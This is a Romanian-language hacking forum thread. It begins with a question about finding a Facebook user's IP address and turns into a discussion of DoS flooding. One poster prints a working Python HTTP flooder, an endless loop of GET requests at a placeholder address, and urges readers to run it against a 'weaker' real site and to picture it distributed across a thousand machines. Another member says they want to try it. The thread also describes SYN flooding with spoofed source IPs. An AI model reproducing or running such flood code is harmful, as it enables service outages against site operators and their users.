Jump to content
Stefan

Cum aflu IP-ul cuiva de pe Facebook?

Recommended Posts

N-ai cum.

 

@GOH: nu mai cere explicatii aiurea. Daca iti da un raspuns favorabil, cum verifici autenticitatea justificarii ?

  • Downvote 1

Share this post


Link to post
Share on other sites

N-are ce sa faca cu IP-ul. Probabil vrea sa afle din ce zona geografica este respectivul individ.

Cat despre spionaj... ii doresc succes. Si 007 tot asa spiona... cauta IP-uri. :))

Share this post


Link to post
Share on other sites

Metode ar exista dar nu sunt cunoscute decat de cei care isi dedica viata hacking-ului sau de cei care se preocupa si chiar vor sa faca asta, oricum nu prea te ajuta cu nimic ip-ul decat sa afle pe unde locuieste, asa cum a spus si Raziel.

Share this post


Link to post
Share on other sites

GOH nu sunt frate, sunt chiar glumet. Dar aici pe forum lumea nu citeste ce scriu si ceilalti si nu mai intelegi nimic pentru ca, probabil, audienta se mai uita si la desene animate in timp ce rasfoieste forumul si na...

Singurele metode sunt:

 

1) ai un prieten angajat la Facebook care are acces in culise;

2) cu ajutorul interogarii conexiunilor stabilite (netstat -an -> State: Established) se poate afla IP-ul serverului prin care se face dialogul cu persoana in cauza. Pe urma:

if (hacker)
{
    sparge_serverul_facebook_si_afla_IPul();
}
  • Downvote 1

Share this post


Link to post
Share on other sites

Eu stiu ce program trebuie si as dori sa stiu ,ce vrei sa faci cu ip-ul ,stiu ca din cmd cu ip-ul cuiva poti sa ii dai un fel de flood ,dar ai mici sanse sa nu fi prins de politie.

Deci cum zice MihneaCatalin.

Deci nu iti zic programul ,fiindca nu poti sa faci lucruri bune decat rele .


                                                                                    jocuri-468x60.png

                   

                                                                                                   Recomand cu incredere HZone Romania - Webhost Calitate Maxima 

Share this post


Link to post
Share on other sites

Eu stiu ce program trebuie si as dori sa stiu ,ce vrei sa faci cu ip-ul ,stiu ca din cmd cu ip-ul cuiva poti sa ii dai un fel de flood ,dar ai mici sanse sa nu fi prins de politie.

Deci cum zice MihneaCatalin.

Deci nu iti zic programul ,fiindca nu poti sa faci lucruri bune decat rele .

Nu, nu vreau sa fac nimic rau, nu am chef sa iau o amenda cat mine de mare. Vreau sa compar ip-ul a doua conturi, sa vad daca e aceeasi persoana.

Share this post


Link to post
Share on other sites

Toate floodurile din lume pe IP se fac, altfel cum ?

Numai ca victima trebuie sa aiba net teapan si floodul trebuie sa fie distribuit ca sa simta ceva. Sunt sanse mari sa pice si providerul.

  • Downvote 1

Share this post


Link to post
Share on other sites

E bun?

 

Ip-ul este 127.0.0.1
Cu placere

 

 

=))

 

Vezi ce zice Anonymous , cu ceva mita iti vor sparge tot Facebook-ul :))). Trebuie sa fii cu "brain-ul"  pe modul 99% , ca sa gasesti o metoda.

 

Eu stiu ce program trebuie si as dori sa stiu ,ce vrei sa faci cu ip-ul ,stiu ca din cmd cu ip-ul cuiva poti sa ii dai un fel de flood ,dar ai mici sanse sa nu fi prins de politie.

Deci cum zice MihneaCatalin.

Deci nu iti zic programul ,fiindca nu poti sa faci lucruri bune decat rele .

+ Pe tine nu te cred . Te lauzi,lauzi,lauzi....Numai zic in continuare "To Be Continued"

Share this post


Link to post
Share on other sites

Toate floodurile din lume pe IP se fac, altfel cum ?

Numai ca victima trebuie sa aiba net teapan si floodul trebuie sa fie distribuit ca sa simta ceva. Sunt sanse mari sa pice si providerul.

 

Sunt oameni '' specializati '' pe asa ceva ... [ Sunt si soft - uri ... greu de gasit , apropo ] ...

Daca s - ar face prin Command Prompt cum zice nenea , pwuuu ...

Nu am zis degeaba ca imi vine greu a crede o iota din ce - i scris de Gogu ' . 

Share this post


Link to post
Share on other sites

Ce visezi ? Stii ce presupune un flood macar ? Oricine poate sa faca floodere de orice tip cu putina pricepere.

Ca tot aveti toti Linux acum, ia analizeaza si executa urmatorul cod Python (un mic flooder http (deci port 80, da ?)), punand ca target un host mai slabut (nu incerca cu google.ro, facebook.com, etc.).

#!/usr/bin/python
import httplib, urllib
conn = httplib.HTTPConnection('adresa_web')
count=0
while(True):
    conn.request("GET", "/");
    resp=conn.getresponse();
    resp.read();
    count+=1
    if(count%100==0):
        print str(count)+" requests"

Daca site-ul respectiv contine cod dinamic (Ex. PHP), efectul este si mai mare. Cred ca intelegi de ce.

Acum ia imagineaza-ti ca acest cod este executat distribuit de 1000 de masini simultan. Ce crezi ca se va intampla ?

Share this post


Link to post
Share on other sites

Ce visezi ? Stii ce presupune un flood macar ? Oricine poate sa faca floodere de orice tip cu putina pricepere.

Ca tot aveti toti Linux acum, ia analizeaza si executa urmatorul cod Python (un mic flooder http (deci port 80, da ?)), punand ca target un host mai slabut (nu incerca cu google.ro, facebook.com, etc.).

#!/usr/bin/python
import httplib, urllib
conn = httplib.HTTPConnection('adresa_web')
count=0
while(True):
    conn.request("GET", "/");
    resp=conn.getresponse();
    resp.read();
    count+=1
    if(count%100==0):
        print str(count)+" requests"

Daca site-ul respectiv contine cod dinamic (Ex. PHP), efectul este si mai mare. Cred ca intelegi de ce.

Acum ia imagineaza-ti ca acest cod este executat distribuit de 1000 de masini simultan. Ce crezi ca se va intampla ?

exceptand #!, dc imi tre linux ca sa ma uit peste(si sa execut) codu ala de python? :))

 

Probabil nu o sa se intample mare lucru daca e un site decent, care refuza conexiuni de la o adresa care e mult prea activa :))


love is a verb
Love is a doing word

Share this post


Link to post
Share on other sites

Pentru ca este mai convenabil. Orice distributie Linux folosita de desktop-isti contine Python in base-system. Ia fa un poll aici sa vedem cati dintre Windoze-ari au Python instalat.

Mai ai de invatat. Ai incercat vreodata sa implementezi un firewall minimal ? Ce crezi ca se intampla de fapt, atunci cand un server refuza o conexiune ? De unde stie daca trebuie sa o refuze sau nu si cine se ocupa de refuzul conexiunii ?

  • Downvote 1

Share this post


Link to post
Share on other sites

pai in primul rand,


Daca site-ul respectiv contine cod dinamic (Ex. PHP), efectul este si mai mare.

Deci nu o sa e mai execute codul dinamic(Ex. PHP), deci procesorul clar nu mai lucreaza atata. Probabil mai ai si un load balancer care poate face treaba asta, pentru ca nu e foarte insensa dpdv computational chestia asta. Multi aleg sa puna un load balancer chiar daca au un singur server, pentru ca ajuta cand vrei sa muti serveru sau alte chestii(cel putin asa sa intamplat in locurile unde am avut tangenta).

Dupaia, probabil viteza mea de upload nu se compara cu viteza de download a serverului, asa ca o sa fie cam greu sa ii fac rau doar prin cati MB imping eu singur pe teava lui. 

 

Logic ca mai am de invatat, si apreciez un raspuns care imi zice ce si unde gresesc :))


love is a verb
Love is a doing word

Share this post


Link to post
Share on other sites

Cu o singura sursa de flood poti lasa confuz lejer un server mai de Doamne-ajuta, eventual daca dai si cu mai multe instante.

Cu flood distribuit dai jos orice, ori pentru ca banda, ori pentru ca resurse server, ori pentru ca provider, ori pentru ca filme. :)

  • Downvote 1

Share this post


Link to post
Share on other sites

Deci vreau sa spun ca sunt extrem de confuz .​

Mereu am crezut ca pentru 1 flood e nevoie de pricepere maxima in programare ... + o super configuratie si '' baza '' software [  ceva mega - sofisticat si nu o simpla functie ] .

​Nu stiu ... La cum pui tu problema , pare destul de usor ...

​Lesne de inteles ca imi da mana sa incerc .

Share this post


Link to post
Share on other sites

Raziel, cu un flood distribuit (pe calculatoare suficiente) sunt de acord cu tine ca dai jos destule.

Totusi, imi sustin parerea ca folosind doar compu meu de acasa, cu un net obisnuit (chiar si asta de 1gbps de la RDS) nu pot sa dau jos un server care are un host decent. Chiar as aprecia daca miai demonstra cum, cu niste cifre/exemple/linkuri.. 

 

Eu de exemplu am un net care are 60mbps down si 20mbps up. Deci doar prin trafic pur (deci ma blocat deja firewallu) nu pot sa imping prea mult.

 

Terror: unele atacuri sunt destul de usor de facut in teorie, dar necesita putere mare. Altele sunt foarte usor de facut, dar necesita acces la anumite resurse. De exemplu aici ai un exemplu http://en.wikipedia.org/wiki/ARP_spoofing . Totusi ai nevoie sa fi pe acelasi LAN ca si victima.

 

Mai exista si atacuri care se bazeaza pe vulnerabilitati din protocol.. de exemplu syn flooding: http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-4/syn_flooding_attacks.html

Aici pur si simplu deschizi conexiuni cu serveru, dar il lasi in asteptare. Dupaia deschizi alta, si alta.. pana cand serveru e asa plin incat nu mai poate accepta alte conexiuni.  Aici e misto ca poti masca IPul tau (poti pune un IP aleatoriu) si e mai greu de detectat. (app sa faci pachete cu alt IP sursa iara e simplu.. exista programe pentru asta)


love is a verb
Love is a doing word

Share this post


Link to post
Share on other sites

Deci , ceva - ceva stiam eu cu programul de IP .

N - am stiut cum sa ma exprim , scuze .

P . S : Imi place sa invat ca sa stiu cam la ce ma expun ca simplu internaut .

Daca exista o bresa , ar trebui sa existe si o posibilitate de stopare [ acum gandesc din puncte de vedere al victimei ] , nu ?

Eu d'astea vazusem doar la TV si mi se pareau SF cand vedeam la aia un cybertask :) .

Share this post


Link to post
Share on other sites

Daca este un host cel putin decent si deja te-a blocat, e nevoie de distribuit.

 

@Terror: vorbim de floodere, nu de hacking pervers. Degeaba ai pricepere maxima in programare daca nu cunosti protocoale de comunicatii electronice, stack-ul TCP/IP, nu ai implementat niciodata un soft client-server, nu stii cum functioneaza o retea de calculatoare, nu cunosti sistemele de operare la nivel de implementare.

"Programare" este un termen generic din care deriva specializari. Unui programator expert in programare Win32 (C# eventual), ii va lua mult timp sa fie fluent in programare embedded / real-time de exemplu.

Astept sa invatati ca berila, ca sa putem vorbi la alt nivel. Nu-ti poate face nimeni un rezumat pe forum.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...